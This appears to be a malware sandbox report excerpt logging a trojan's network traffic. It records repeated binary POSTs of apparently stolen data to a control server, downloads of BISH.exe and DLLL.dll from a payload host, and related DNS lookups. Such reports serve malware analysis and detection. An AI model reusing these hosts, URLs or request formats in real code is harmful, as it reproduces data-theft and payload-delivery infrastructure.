Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 192Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 192Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 165Connection: close

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 5_2_00404ED4 recv,

5_2_00404ED4

Source: global traffic	HTTP traffic detected: GET /BISH.exe HTTP/1.1Host: dddotx.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /DLLL.dll HTTP/1.1Host: dddotx.shop

Source: global traffic	DNS traffic detected: DNS query: dddotx.shop
Source: global traffic	DNS traffic detected: DNS query: dvlref.online

Source: unknown

HTTP traffic detected: POST /BISH/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dvlref.onlineAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D2101A5EContent-Length: 192Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lB9J6s8SQ9jwJB6KPE7WaRiqvJVgyap28y1%2F0ZZatlRSTjKU%2B%2BYrjrWv5V0vXtNoAF7d9JICm0OBWM1UMrQkFur5GrGB1CvnQM0x%2FlVoN%2FNWI77GvYSjuFU6tm0iRSrZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc36a2a1742ea-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1571&rtt_var=785&sent=3&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=434&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RQhyCcmUTN%2Fd%2BP25HGlU4QVQSV%2Fqgi5fJSJPjd6uOLs6B1favhkAPWDlxhzcabtKk0bp2oWWFfwSdRU3kjAESicg7Qohk91jiLA0TCajJUhKh1hqmn9Iy5t5X9gXWCcq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc375a8c81879-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=830&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=434&delivery_rate=0&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2eatgvcaiUJZC7cOta5y1d3j7y6zVNENhECDO19IPxZ8Np1EOfBHy2X2nyEuxC44LxCU8P9%2FcRIJBRAlraWDUvmZFoOoxGZeGib%2F8DpfL6T%2FUu6znaCKKiBQW52n%2BARa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc37f7f1d7c6c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1z%2FmD23GnYoTnQmuXMnVNYoecc8kP0SjWKTE8%2FjZvU3ByNqR5R6NiItkp9jH%2F8tXEGY6XZM6p8AAm4DnHSYMp4VrrENnCAV7swJ19V%2B5JJghE5fuxX9AFhmQB%2F%2FvUVhi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc38a982a41a1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1685&rtt_var=842&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PyEJvmVufewW22JEVfFA%2Fqb%2BQgjlWL5MJyLxOiY9OBakJMTPwqKRbyAeJK3Xae1lyH1keg%2Bo%2FOUHTpfT1Wxz%2BOV21k%2FhqOGzlUJLdURthcBInB9XfM1aMbVuWlPDGHyw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc3951d883338-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1815&rtt_var=907&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKL2ITkofRYSfXMDuYwSpHl0NDjyGYQntytZSN94GNloBwZ2KBvx3bnyLURnQ8%2BqoZ22g9vHFweajYZ8mSQZYOW7fUE24%2FbVUW05zwjNK%2Fv1iWnZQs%2FmLw4rzxt12Yd1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc3a1e82743ec-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2453&min_rtt=2453&rtt_var=1226&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KOshBIpuOpiFyJrYI0GBNEN4drZABeojpF7aNqd8P45jzHipPNsCprZR%2F%2F%2Fx92uAMSajeK7myc6O69MqMSOzt39gIsGxq33oEtX6lwB6elly0MORhtxIq92Edxy8XwYf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc3ac999a5e6b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1682&rtt_var=841&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kf%2B7qSiTZnzGoqv70sN4r4KaHmEpTNc2ovxUPxB5hYAoOnT7lsRk7RVr9B1QIe0Nq0Q3Wm0U4IGtJxO18dXVIJ9gb1Zl3C5pVfQ2fKmzmJZ8r%2F%2FIe%2BVxIoE3%2BRF7UDeX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc3b6fd68de92-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2611&min_rtt=2611&rtt_var=1305&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
